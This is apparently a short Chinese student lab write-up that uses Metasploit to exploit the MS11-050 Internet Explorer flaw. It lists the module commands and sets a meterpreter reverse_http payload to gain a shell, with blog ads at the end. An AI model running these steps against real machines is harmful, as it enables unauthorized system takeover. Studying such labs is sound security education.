20145322 Exp5 MS11_050
20145322 Exp5 MS11_050
实验过程
msfconsole命令进入控制台
使用命令search ms11_050查看针对MS11_050漏洞的攻击模块
使用命令 use exploit/windows/browser/ms11_050_mshtml_cobjectelement 进入模块,并使用info查看该模块的具体信息
设置paylaods,我们选择了windows/meterpreter/reverse_http该payload会返回一个遵循http协议的shell,我们以此来获得目标主机系统权限。
使用命令set payloads windows/meterpreter/reverse_http
使用show options 查看具体参数设置
设置其相关参数,攻击
成功
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步